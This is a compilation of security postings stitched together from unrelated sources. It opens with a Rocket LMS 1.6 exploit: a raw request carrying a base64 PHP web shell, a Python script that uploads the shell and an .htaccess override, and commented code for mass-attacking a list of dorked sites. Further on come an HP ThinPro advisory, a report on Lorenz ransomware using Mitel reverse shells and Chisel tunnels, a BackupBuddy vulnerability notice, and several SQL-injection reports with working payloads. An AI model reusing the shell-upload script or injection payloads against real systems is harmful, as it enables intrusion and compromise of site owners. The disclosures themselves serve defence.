Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= "http://"        URL = str(ssl+self.host+":"+self.port+self._url_to_login)        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)        csrftoken = self.get_csrf_token(client,URL)        fromt = client.get(URL)  # sets cookie              login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')        r = client.post(URL, data=login_data, cookies=client.cookies)                   self.upload_shell(client,URL2)        self.upload_htaccess(client,URL2)    def upload_shell(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)        with open(self.file,"r") as payload:            to_base64 = payload.read()                         to_base64 = str(to_base64).encode("utf-8")            base64_encoded_data=  base64.b64encode(to_base64)            base64_encoded_data = str(base64_encoded_data)[:-1]            base64_encoded_data = str(base64_encoded_data)[2:]                        string = "data:image/php;base64,"+str(base64_encoded_data)            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")            r = client.post(URL, data=data, cookies=client.cookies)            print(r.status_code)            if r.status_code == 200:                print("sent and uploaded shell :"+URL+"\n")            else:                 print("couldn't upload shell")         def upload_htaccess(self,client,URL):        csrftoken = self.get_csrf_token(client,URL)           string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")        r = client.post(URL, data=data, cookies=client.cookies)        print(r.status_code)        if r.status_code == 200:            print("sent and uploaded htaccess:"+URL+"\n")            print("Go and rename file in filemanager on website")        else:             print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:#     with open("sites.txt","r") as urls:#         url = urls.readlines()#         ssl = True#         port = 443#         for line in url:            #             try:#                 if "sslyok" in line:#                     port = 80#                     ssl = False#                 line = str(line.rstrip('%0a'))                #                 print("trying:"+line)#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")#                 elon.login()#                 time.sleep(1)    #             except Exception:#                 #traceback.print_exc()#                 print("atamadim")                #             finally:#                 print("okey")# except Exception:#                 print("atamadim")

Rocket LMS 1.6 Shell Upload

A potential security vulnerability has been identified in HP ThinPro 7.2 Service Pack 8 (SP8). The security vulnerability in SP8 is not remedied after upgrading from SP8 to Service Pack 9 (SP9). HP has released Service Pack 10 (SP10) to remediate the potential vulnerability introduced in SP8.

A potential security vulnerability has been identified in HP ThinPro 7.2 Service Pack 8 (SP8). The security vulnerability in SP8 is not remedied after upgrading from SP8 to Service Pack 9 (SP9). HP has released Service Pack 10 (SP10) to remediate the potential vulnerability introduced in SP8.

Severity

Medium

HP Reference

HPSBHF03789 Rev. 1

Release date

June 16, 2022

Last updated

June 16, 2022

Category

PC

Potential Security Impact

Unauthorized modification of certain files

**Summary**

By default, the HP ThinPro OS file system is in a locked state. HP has observed that installing HP ThinPro 7.2 Service Pack 8 leaves the file system in an unlocked state. However, the UNIX file system permissions are in effect, limiting the potential for unauthorized modification.

HP recommends installing Service Pack 10.

**Relevant Common Vulnerabilities and Exposures (CVE) List**

List of CVE IDs    

CVE ID

Base Score

Base Vector

Vendor ID

CVSS-2022-1602

6.6

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

HP

Learn more about CVSS 3.1 base metrics, which range from 0 to 10.

PSR-2022-0042

**References**

Refer to HP ThinUpdate and HP EasyUpdate for the availability of all HP ThinPro 7.2 Service Packs.

**Resolution**

Upgrade to SP10 or higher to avoid this issue.

Note:

This bulletin may be updated when new information and/or SoftPaqs are available. Sign up for HP Subscriptions to be notified and receive:

*   Product support eAlerts
    
*   Driver updates
    
*   Security Bulletin updates
    

**Affected products**

Identify the affected thin client products.

Thin Clients  

Product name

Component type

HP Desktop Thin Client t240

Hardware

HP Desktop Thin Client t420

Hardware

HP Desktop Thin Client t430

Hardware

HP Desktop Thin Client t530

Hardware

HP Desktop Thin Client t540

Hardware

HP Desktop Thin Client t628

Hardware

HP Desktop Thin Client t630

Hardware

HP Desktop Thin Client t638

Hardware

HP Desktop Thin Client t730

Hardware

HP Desktop Thin Client t740

Hardware

HP Mobile Thin Client mt21

Hardware

HP Mobile Thin Client mt22

Hardware

HP Mobile Thin Client mt32

Hardware

HP Mobile Thin Client mt45

Hardware

HP Mobile Thin Client mt46

Hardware

HP ThinPro PC Converter

Software

**Revision history**

This document has been revised according to the information below.

List of versions   

Version

Description

Date

1

Initial Release

June 16, 2022

**Additional information**

Follow these links for additional information.

Third-party security patches

Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support

For issues about implementing the recommendations of this Security Bulletin, visit http://www.hp.com/go/contacthp to learn about your HP support options.

Report

To report a potential security vulnerability with any HP supported product, send email to: hp-security-alert@hp.com.

Subscribe

To initiate a subscription to receive future HP Security Bulletin alerts via email, visit https://h41369.www4.hp.com/alerts-signup.php?lang=en&cc=US&jumpid=hpsc\_profile.

Security bulletin archive

To view released Security Bulletins, visit https://support.hp.com/security-bulletins.

It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.

Download HP’s security-alert PGP key

**Legal information**

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Security Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Security Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.

© Copyright 2022 HP Development Company, L.P.

HP Inc. (HP) shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. "HP Inc.," "HP" and the names of HP products referenced herein are trademarks of HP Inc. or its affiliates in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

CVE-2022-1602: HP ThinPro OS - File System Unlocked in HP ThinPro 7.2 Service Pack 8 (SP8)

The ransomware gang has been seen exploiting a Mitel RCE flaw discovered in VoIP devices in April (and patched in July) to perform double-extortion attacks.

A ransomware gang has been seen using a unique initial-access tactic to exploit a vulnerability in voice-over-IP (VoIP) appliances to breach corporate phone systems, before pivoting to corporate networks to commit double-extortion attacks.  

Researchers from Artic Wolf Labs have spotted the Lorenz ransomware group exploiting a flaw in Mitel MiVoice VoIP appliances. The bug (tracked as CVE-2022-29499) was discovered in April and fully patched in July, and is a remote code execution (RCE) flaw affecting the Mitel Service Appliance component of MiVoice Connect.

Lorenz exploited the flaw to obtain a reverse shell, after which the group leveraged Chisel, a Golang-based fast TCP/UDP tunnel that’s transported over HTTP, as a tunneling tool to breach the corporate environment, Arctic Wolf researchers said this week. The tool is "mainly useful for passing through firewalls," according to the GitHub page.

The attacks show an evolution by threat actors to use "lesser known or monitored assets" to access networks and perform further nefarious activity to avoid detection, according to Arctic Wolf.

"In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and Internet of Things (IoT) devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected," the researchers wrote.

The activity underscores the need for enterprises to monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices, researchers said.

Mitel identified CVE-2022-29499 on April 19 and provided a script for releases 19.2 SP3 and earlier, and R14.x and earlier as a workaround before releasing MiVoice Connect version R19.3 in July to fully remediate the flaw.

**Attack Details**

Lorenz is a ransomware group that has been active since at least February 2021, and, like many of its cohorts, performs double extortion of its victims by exfiltrating data and threatening to expose it online if victims don't pay the desired ransom in a certain time frame.

Over the last quarter, the group has primarily targeted small and medium businesses (SMBs) located in the United States, with outliers in China and Mexico, according to Arctic Wolf.

In the attacks that researchers identified, the initial malicious activity originated from a Mitel appliance sitting on the network perimeter. Once establishing a reverse shell, Lorenz made use of the Mitel device’s command line interface to create a hidden directory and proceeded to download a compiled binary of Chisel directly from GitHub, via Wget.

Threat actors then renamed the Chisel binary to "mem," unzipped it, and executed it to establish a connection back to a Chisel server listening at hxxps\[://\]137.184.181\[.\]252\[:\]8443, researchers said. Lorenz skipped TLS certificate verification and turned the client into a SOCKS proxy.

It's worth noting that Lorenz waited nearly a month after breaching the corporate network to conduct additional ransomware activity, researchers said. Upon returning to the Mitel device, threat actors interacted with a Web shell named "pdf\_import\_export.php." Shortly thereafter, the Mitel device started a reverse shell and Chisel tunnel again so threat actors could jump onto the corporate network, according to Arctic Wolf.

Once on the network, Lorenz obtained credentials for two privileged administrator accounts, one with local admin privileges and one with domain admin privileges, and used them to move laterally through the environment via RDP and subsequently to a domain controller.

Before encrypting files using BitLocker and Lorenz ransomware on ESXi, Lorenz exfiltrated data for double-extortion purposes via FileZilla, researchers said.

**Attack Mitigation**

To mitigate attacks that can leverage the Mitel flaw to launch ransomware or other threat activity, researchers recommend that organizations apply the patch as soon as possible.

Researchers also made general recommendations to avoid risk from perimeter devices as a way to avoid the pathways to corporate networks. One way to do this is to perform external scans to assess an organization's footprint and harden its environment and security posture, they said. This will allow enterprises to discover assets about which administrators may not have known so that they can be protected, as well as help define an organization's attack surface across devices exposed to the Internet, researchers noted.

Once all assets are identified, organizations should ensure that critical ones are not directly exposed to the Internet, removing a device from the perimeter if it doesn't need to be there, researchers recommended.

Artic Wolf also recommended that organizations turn on Module Logging, Script Block Logging, and Transcription Logging, and send logs to a centralized logging solution as part of their PowerShell Logging configuration. They also should store captured logs externally so that they can perform detailed forensic analysis against evasive actions by threat actors in the case of an attack.

Lorenz Ransomware Goes After SMBs via Mitel VoIP Phone Systems

Categories: News
Tags: BackupBuddy

Tags:  WordPress

Tags:  vulnerability

Tags:  exploit

Tags:  hack

Tags:  compromise

Tags:  update

We take a look at a vulnerability in popular WordPress plugin BackupBuddy, and the steps you need to take to fix it.



(Read more...)




The post BackupBuddy WordPress plugin vulnerable to exploitation, update now! appeared first on Malwarebytes Labs.

Users of WordPress may need to perform an urgent update related to the popular BackupBuddy plugin. BackupBuddy is a plugin which offers backup solutions designed to combat “hacks, malware, user error, deleted files, and running bad commands”. Unfortunately, running an older version of BackupBuddy could leave your site open to potential breaches. According to Security Week, the issue tagged as CVE-2022-31474 is down to an “insecure method of downloading the backups for local storing”. This results in people being able to grab files from the server without having been properly authenticated first.

**Traversing a WordPress installation**

The vulnerability is listed as a “Directory Traversal Vulnerability”, and affects users running BackupBuddy from version 8.5.8.0 up to 8.7.4.1. The developers make the following observations:

*   Using this vulnerability, attackers can view the contents of any file on your server which is readable by the WordPress installation. Sensitive files could be made available to the attackers, which is not something you’d want to happen.
*   The vulnerability is being actively exploited in the wild. Sometimes you get lucky and find that something has been patched before anyone can make use of it. This isn’t the case here, sadly.
*   The developers have made the security update available to anybody running BackupBuddy, regardless of version. No matter which licence you’re using, you can apply the fix. In theory, there is no need for anyone, anywhere to be running a vulnerable installation with the fix available to install.

**Next steps to take for BackupBuddy users**

*   Backup to version 8.7.5 right away. You should be doing this whether or not you’re concerned by the above security issue. Old versions of products frequently fall victim to additional security issues over time, especially if they’re no longer maintained.
*   Reset your database password if you suspect there’s been a compromise of your WordPress installation.
*   Change your WordPress salts. These are tools at your disposal used to help keep passwords for your site secure.
*   Reset and update anything else not for public consumption in your wp-config.php, for example stored API keys for other services.

**The risks of not updating your site and plugins**

WordPress is an immensely popular target for people fully invested in site compromise. Hijacked sites can be used for SEO poisoning, redirecting to malicious sites, spam, malware installation, phishing, and more.

If you’re running BackupBuddy, go and check your current version and update right away. Once that’s done, it would be wise to ensure everything else on your WordPress installation is fully up to date too. Let’s not make it easy for those up to no good: It won’t help your business, or the people who make use of your site.

BackupBuddy WordPress plugin vulnerable to exploitation, update now!

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /maintenance/manage_department.php.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/maintenance/manage\_department.php?id

Vulnerability location: /leave\_system/admin/maintenance/manage\_department.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/maintenance/manage\_department.php?id=1%27%20and%20length(database())%20=9--+ // Leak place ---> id

GET /leave\_system/admin/maintenance/manage\_department.php?id\=1%27%20and%20length(database())%20\=9\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38302: bug_report/SQLi-1.md at main · GGMMNN/bug_report

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /maintenance/manage_leave_type.php.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/maintenance/manage\_leave\_type.php?id

Vulnerability location: /leave\_system/admin/maintenance/manage\_leave\_type.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/maintenance/manage\_leave\_type.php?id=3%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /leave\_system/admin/maintenance/manage\_leave\_type.php?id\=3%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38304: bug_report/SQLi-3.md at main · GGMMNN/bug_report

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /employees/manage_leave_type.php.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/employees/manage\_leave\_type.php?id

Vulnerability location: /leave\_system/admin/employees/manage\_leave\_type.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/employees/manage\_leave\_type.php?id=11%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /leave\_system/admin/employees/manage\_leave\_type.php?id\=11%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38303: bug_report/SQLi-2.md at main · GGMMNN/bug_report

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editclient.php.

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author:Broccoli

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editclient.php?id=

Vulnerability location: /garage/editclient.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editclient.php?id=-1%27+union+select+1,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /garage/editclient.php?id\=\-1%27+union+select+1,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-38610: bug_report/SQLi-2.md at main · sunaono1/bug_report

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editcategory.php.

Permalink

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Broccoli

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editcategory.php?id=

Vulnerability location: /garage/editcategory.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editcategory.php?id=-1%27+union+select+1,database(),3,4--+ // Leak place ---> id

GET /garage/editcategory.php?id\=\-1%27+union+select+1,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-38606: bug_report/SQLi-1.md at main · sunaono1/bug_report

Church Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/edit_event.php.

Permalink

**Church Management System v1.0 by Godfrey De Blessed has SQL injection**

BUG\_Author: Broccoli

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /cman/admin/edit\_event.php?id=

Vulnerability location: /cman/admin/edit\_event.php?id=, id

dbname = cman

\[+\] Payload: /cman/admin/edit\_event.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /cman/admin/edit\_event.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

Tag

#php